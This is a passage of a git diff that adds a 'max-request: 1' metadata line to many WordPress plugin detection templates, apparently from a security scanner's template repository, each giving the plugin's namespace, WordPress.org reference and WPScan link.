+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
